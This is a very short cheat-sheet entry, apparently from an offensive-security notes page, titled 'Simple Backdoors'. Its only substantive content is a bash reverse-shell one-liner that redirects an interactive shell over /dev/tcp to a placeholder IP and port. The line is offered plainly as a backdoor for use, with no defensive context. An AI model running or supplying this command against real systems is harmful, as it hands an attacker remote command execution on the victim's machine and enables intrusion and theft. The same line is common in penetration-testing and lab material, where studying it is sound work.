Simple Backdoors

One-liner Backdoor

bash -i >& /dev/tcp/<IP>/<Port> 0>&1

Resource for One liner Backdoors

Last updated